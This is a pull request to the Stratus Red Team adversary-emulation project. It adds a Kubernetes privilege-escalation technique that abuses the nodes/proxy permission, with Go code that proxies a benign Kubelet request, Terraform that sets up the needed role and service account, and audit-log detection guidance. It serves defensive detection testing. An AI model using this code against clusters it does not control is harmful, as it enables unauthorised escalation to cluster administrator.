### PR TITLE
New attack technique: K8s privilege escalation through nodes/proxy permissions

### DIFF
--- a/docs/attack-techniques/kubernetes/index.md
+++ b/docs/attack-techniques/kubernetes/index.md
@@ -22,5 +22,7 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 
 - [Container breakout via hostPath volume mount](./k8s.privilege-escalation.hostpath-volume.md)
 
+- [Privilege escalation through node/proxy permissions](./k8s.privilege-escalation.nodes-proxy.md)
+
 - [Run a Privileged Pod](./k8s.privilege-escalation.privileged-pod.md)
 

--- a/docs/attack-techniques/kubernetes/k8s.credential-access.dump-secrets.md
+++ b/docs/attack-techniques/kubernetes/k8s.credential-access.dump-secrets.md
@@ -40,8 +40,8 @@ stratus detonate k8s.credential-access.dump-secrets
 ## Detection
 
 
-Using Kubernetes API server audit logs. In particular, look for **list secrets** requests that are performed
-for a specific namespace.
+Using Kubernetes API server audit logs. In particular, look for **list secrets** requests that are not performed
+for a specific namespace (i.e., that apply to all namespaces).
 
 Sample event (shortened):
 

--- a/docs/attack-techniques/kubernetes/k8s.privilege-escalation.nodes-proxy.md
+++ b/docs/attack-techniques/kubernetes/k8s.privilege-escalation.nodes-proxy.md
@@ -1,0 +1,83 @@
+---
+title: Privilege escalation through node/proxy permissions
+---
+
+# Privilege escalation through node/proxy permissions
+
+
+ <span class="smallcaps w3-badge w3-blue w3-round w3-text-white" title="This attack technique can be detonated multiple times">idempotent</span> 
+
+Platform: kubernetes
+
+## MITRE ATT&CK Tactics
+
+
+- Privilege Escalation
+
+## Description
+
+
+Uses the node proxy API to proxy a Kubelet request through a worker node. This is a vector of privilege escalation, allowing
+any principal with the `nodes/proxy` permission to escalate their privilege to cluster administrator, 
+bypassing at the same time admission control checks and logging of the API server.
+
+<span style="font-variant: small-caps;">Warm-up</span>:
+
+- Create a namespace
+- Create a service account in this namespace
+- Create a cluster role with `nodes/proxy` permissions 
+- Bind the cluster role to the service account
+
+<span style="font-variant: small-caps;">Detonation</span>:
+
+- Retrieve a token for the service account with `nodes/proxy` permissions creating during warm-up
+- Use the node proxy API to proxy a benign request to the Kubelet through the worker node
+
+References:
+
+- https://blog.aquasec.com/privilege-escalation-kubernetes-rbac
+- https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.22/#-strong-proxy-operations-node-v1-core-strong-
+
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate k8s.privilege-escalation.nodes-proxy
+```
+## Detection
+
+
+Using Kubernetes API server audit logs, you can identify when the nodes proxy API is used.
+
+Sample event (shortened):
+
+```json hl_lines="3 4"
+{
+  "objectRef": {
+    "resource": "nodes",
+    "subresource": "proxy",
+    "name": "ip-192-168-34-255.eu-west-1.compute.internal",
+    "apiVersion": "v1"
+  },
+  "http": {
+    "url_details": {
+      "path": "/api/v1/nodes/ip-192-168-34-255.eu-west-1.compute.internal/proxy/runningpods/"
+    },
+    "method": "get",
+    "status_code": 200,
+    "status_category": "OK"
+  },
+  "kind": "Event",
+  "level": "Request",
+  "requestURI": "/api/v1/nodes/ip-192-168-34-255.eu-west-1.compute.internal/proxy/runningpods/",
+}
+```
+
+In normal operating conditions, it's not expected that this API is used frequently. 
+Consequently, alerting on `objectRef.resource == "nodes" && objectRef.subresource == "proxy"` should yield minimal false positives.'
+
+Additionally, looking at the Kubelet API path that was proxied can help identify malicious activity (/runningpods) in this example.
+See [kubeletctl](https://github.com/cyberark/kubeletctl/blob/master/pkg/api/constants.go) for an unofficial list of Kubelet API endpoints.
+
+

--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -36,4 +36,5 @@ This page contains the list of all Stratus Attack Techniques.
 | [Steal Pod Service Account Token](./kubernetes/k8s.credential-access.steal-serviceaccount-token.md) | [kubernetes](./kubernetes/index.md) | Credential Access |
 | [Create Admin ClusterRole](./kubernetes/k8s.persistence.create-admin-clusterrole.md) | [kubernetes](./kubernetes/index.md) | Persistence, Privilege Escalation |
 | [Container breakout via hostPath volume mount](./kubernetes/k8s.privilege-escalation.hostpath-volume.md) | [kubernetes](./kubernetes/index.md) | Privilege Escalation |
+| [Privilege escalation through node/proxy permissions](./kubernetes/k8s.privilege-escalation.nodes-proxy.md) | [kubernetes](./kubernetes/index.md) | Privilege Escalation |
 | [Run a Privileged Pod](./kubernetes/k8s.privilege-escalation.privileged-pod.md) | [kubernetes](./kubernetes/index.md) | Privilege Escalation |

--- a/internal/attacktechniques/k8s/privilege-escalation/nodes-proxy/main.go
+++ b/internal/attacktechniques/k8s/privilege-escalation/nodes-proxy/main.go
@@ -1,0 +1,181 @@
+package kubernetes
+
+import (
+	"context"
+	"crypto/tls"
+	_ "embed"
+	"errors"
+	"fmt"
+	"github.com/datadog/stratus-red-team/internal/providers"
+	"github.com/datadog/stratus-red-team/pkg/stratus"
+	"github.com/datadog/stratus-red-team/pkg/stratus/mitreattack"
+	"io"
+	authenticationv1 "k8s.io/api/authentication/v1"
+	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+	"k8s.io/client-go/kubernetes"
+	"log"
+	"net/http"
+	"strconv"
+)
+
+//go:embed main.tf
+var tf []byte
+
+func init() {
+	const codeBlock = "```"
+	const code = "`"
+
+	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+		ID:                 "k8s.privilege-escalation.nodes-proxy",
+		FriendlyName:       "Privilege escalation through node/proxy permissions",
+		Platform:           stratus.Kubernetes,
+		IsIdempotent:       true,
+		MitreAttackTactics: []mitreattack.Tactic{mitreattack.PrivilegeEscalation},
+		Description: `
+Uses the node proxy API to proxy a Kubelet request through a worker node. This is a vector of privilege escalation, allowing
+any principal with the ` + code + `nodes/proxy` + code + ` permission to escalate their privilege to cluster administrator, 
+bypassing at the same time admission control checks and logging of the API server.
+
+Warm-up:
+
+- Create a namespace
+- Create a service account in this namespace
+- Create a cluster role with ` + code + `nodes/proxy` + code + ` permissions 
+- Bind the cluster role to the service account
+
+Detonation:
+
+- Retrieve a token for the service account with ` + code + `nodes/proxy` + code + ` permissions creating during warm-up
+- Use the node proxy API to proxy a benign request to the Kubelet through the worker node
+
+References:
+
+- https://blog.aquasec.com/privilege-escalation-kubernetes-rbac
+- https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.22/#-strong-proxy-operations-node-v1-core-strong-
+
+`,
+		Detection: `
+Using Kubernetes API server audit logs, you can identify when the nodes proxy API is used.
+
+Sample event (shortened):
+
+` + codeBlock + `json hl_lines="3 4"
+{
+  "objectRef": {
+    "resource": "nodes",
+    "subresource": "proxy",
+    "name": "ip-192-168-34-255.eu-west-1.compute.internal",
+    "apiVersion": "v1"
+  },
+  "http": {
+    "url_details": {
+      "path": "/api/v1/nodes/ip-192-168-34-255.eu-west-1.compute.internal/proxy/runningpods/"
+    },
+    "method": "get",
+    "status_code": 200,
+    "status_category": "OK"
+  },
+  "kind": "Event",
+  "level": "Request",
+  "requestURI": "/api/v1/nodes/ip-192-168-34-255.eu-west-1.compute.internal/proxy/runningpods/",
+}
+` + codeBlock + `
+
+In normal operating conditions, it's not expected that this API is used frequently. 
+Consequently, alerting on ` + code + `objectRef.resource == "nodes" && objectRef.subresource == "proxy"` + code + ` should yield minimal false positives.'
+
+Additionally, looking at the Kubelet API path that was proxied can help identify malicious activity (/runningpods) in this example.
+See [kubeletctl](https://github.com/cyberark/kubeletctl/blob/master/pkg/api/constants.go) for an unofficial list of Kubelet API endpoints.
+`,
+		PrerequisitesTerraformCode: tf,
+		Detonate:                   detonate,
+	})
+}
+
+func detonate(params map[string]string) error {
+	client := providers.K8s().GetClient()
+	serviceAccountName := params["service_account_name"]
+	serviceAccountNamespace := params["service_account_namespace"]
+
+	// Step 1: Get a service account token for our service account, which has "nodes/proxy" permissions
+	log.Println("Retrieving service account token for service account " + serviceAccountName)
+	authenticationToken, err := getServiceAccountToken(serviceAccountName, serviceAccountNamespace, client)
+	if err != nil {
+		return err
+	}
+
+	// Step 2: Choose a node to proxy from
+	node, err := getRandomNodeName(client)
+	if err != nil {
+		return err
+	}
+
+	// Step 3: Proxy the request to the Kubelet through this node
+	log.Println("Using worker node '" + node + "' to proxy to the Kubelet API")
+	_, err = proxyKubeletRequest("/runningpods/", authenticationToken, node, client)
+	if err != nil {
+		return err
+	}
+
+	log.Println("Successfully proxied a benign Kubelet API request through the worker node")
+	return nil
+}
+
+// Generates a service account token for a specific service account
+func getServiceAccountToken(serviceAccount string, namespace string, client *kubernetes.Clientset) (string, error) {
+	tokenRequest := &authenticationv1.TokenRequest{}
+	options := metav1.CreateOptions{}
+	result, err := client.CoreV1().ServiceAccounts(namespace).CreateToken(context.Background(), serviceAccount, tokenRequest, options)
+	if err != nil {
+		return "", errors.New("unable to retrieve service account token for " + serviceAccount + ": " + err.Error())
+	}
+
+	return result.Status.Token, nil
+}
+
+// Returns the name of a worker node, no matter which one
+func getRandomNodeName(client *kubernetes.Clientset) (string, error) {
+	result, err := client.CoreV1().Nodes().List(context.Background(), metav1.ListOptions{})
+	if err != nil {
+		return "", errors.New("unable to list worker nodes: " + err.Error())
+	}
+	return result.Items[0].ObjectMeta.Name, nil
+}
+
+// Uses the nodes proxy API to proxy a request through a node to hit the Kubelet
+// see https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.22/#-strong-proxy-operations-node-v1-core-strong-
+func proxyKubeletRequest(kubeletApiPath string, token string, node string, client *kubernetes.Clientset) (string, error) {
+	// Note: We have to use a raw HTTP request because it's not straightforward to create a new K8s API client from
+	// a static bearer token
+	config := providers.K8s().GetRestConfig()
+	httpClient := &http.Client{
+		Transport: &http.Transport{
+			TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
+		},
+	}
+	apiServerUrl := fmt.Sprintf("%s/%s", config.Host, config.APIPath)
+	endpointUrl := fmt.Sprintf("%sapi/v1/nodes/%s/proxy%s", apiServerUrl, node, kubeletApiPath)
+	req, _ := http.NewRequest("GET", endpointUrl, nil)
+	req.Header.Set("Authorization", "Bearer "+token)
+	req.Header.Set("User-Agent", providers.StratusUserAgent)
+
+	log.Println("Performing request to " + endpointUrl)
+	response, err := httpClient.Do(req)
+
+	if err != nil {
+		return "", errors.New("unable to proxy to the Kubelet API: " + err.Error())
+	}
+
+	rawBody, err := io.ReadAll(response.Body)
+	if err != nil {
+		return "", errors.New("unable to read Kubelet response body: " + err.Error())
+	}
+	body := string(rawBody)
+
+	if statusCode := response.StatusCode; statusCode != 200 {
+		return "", errors.New("got non-200 status code from the proxying API: " + strconv.Itoa(statusCode) + "\nresponse body: " + body)
+	}
+
+	return body, nil
+
+}

--- a/internal/attacktechniques/k8s/privilege-escalation/nodes-proxy/main.tf
+++ b/internal/attacktechniques/k8s/privilege-escalation/nodes-proxy/main.tf
@@ -1,0 +1,87 @@
+terraform {
+  required_providers {
+    kubernetes = {
+      source  = "hashicorp/kubernetes"
+      version = "2.7.1"
+    }
+  }
+}
+
+locals {
+  kubeconfig_path = pathexpand("~/.kube/config")
+  namespace = format("stratus-red-team-%s", random_string.suffix.result)
+}
+
+# Use ~/.kube/config as a configuration file if it exists (with current context).
+# Fallback to using in-cluster configuration
+# see https://registry.terraform.io/providers/hashicorp/kubernetes/latest/docs#authentication
+provider "kubernetes" {
+  config_path = fileexists(local.kubeconfig_path) ? local.kubeconfig_path : null
+}
+
+resource "random_string" "suffix" {
+  length    = 8
+  min_lower = 8
+}
+
+resource "kubernetes_namespace" "namespace" {
+  metadata {
+    name   = local.namespace
+    labels = { "datadoghq.com/stratus-red-team" : true }
+  }
+}
+
+output "namespace" {
+  value = kubernetes_namespace.namespace.metadata[0].name
+}
+
+resource "kubernetes_cluster_role" "clusterrole" {
+  metadata {
+    name = "stratus-red-team-node-proxy-clusterrole"
+  }
+
+  rule {
+    api_groups = [""]
+    resources  = ["nodes/proxy"]
+    verbs      = ["get", "create"]
+  }
+}
+
+resource "kubernetes_service_account" "sa" {
+  metadata {
+    name = "stratus-red-team-node-proxy-sa"
+    namespace = kubernetes_namespace.namespace.metadata[0].name
+  }
+}
+
+resource "kubernetes_cluster_role_binding" "crb" {
+  metadata {
+    name = "stratus-red-team-node-proxy-crb"
+  }
+
+  role_ref {
+    api_group = "rbac.authorization.k8s.io"
+    kind      = "ClusterRole"
+    name      = kubernetes_cluster_role.clusterrole.metadata[0].name
+  }
+  subject {
+    kind      = "ServiceAccount"
+    name      = kubernetes_service_account.sa.metadata[0].name
+    namespace = kubernetes_service_account.sa.metadata[0].namespace
+  }
+}
+
+output "service_account_name" {
+  value = kubernetes_service_account.sa.metadata[0].name
+}
+
+output "service_account_namespace" {
+  value = local.namespace
+}
+output "display" {
+  value = format(
+    "K8s service account with node/proxy permission is ready: %s in namespace %s",
+    kubernetes_service_account.sa.metadata[0].name,
+    kubernetes_namespace.namespace.metadata[0].name
+  )
+}

--- a/internal/attacktechniques/main.go
+++ b/internal/attacktechniques/main.go
@@ -28,5 +28,6 @@ import (
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/credential-access/steal-serviceaccount-token"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/persistence/create-admin-clusterrole"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/privilege-escalation/hostpath-volume"
+	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/privilege-escalation/nodes-proxy"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/privilege-escalation/privileged-pod"
 )


### PR DESCRIPTION
Tested on Minikube and EKS.

Sample output:

```
2022/03/04 11:12:20 Checking your authentication against kubernetes
2022/03/04 11:12:21 Warming up k8s.privilege-escalation.node-proxy
2022/03/04 11:12:21 Initializing Terraform to spin up technique prerequisites
2022/03/04 11:12:24 Applying Terraform to spin up technique prerequisites
2022/03/04 11:12:31 K8s service account with node/proxy permission is ready: stratus-red-team-node-proxy-sa in namespace stratus-red-team-rzaydove
2022/03/04 11:12:31 Retrieving service account token for service account stratus-red-team-node-proxy-sa
2022/03/04 11:12:31 Using worker node 'ip-192-168-34-255.eu-west-1.compute.internal' to proxy to the Kubelet API
2022/03/04 11:12:31 Performing request to https://A4C6451868D88529D926E136709C8045.gr7.eu-west-1.eks.amazonaws.com/api/v1/nodes/ip-192-168-34-255.eu-west-1.compute.internal/proxy/runningpods
2022/03/04 11:12:31 Successfully proxied a benign Kubelet API request through the worker node
```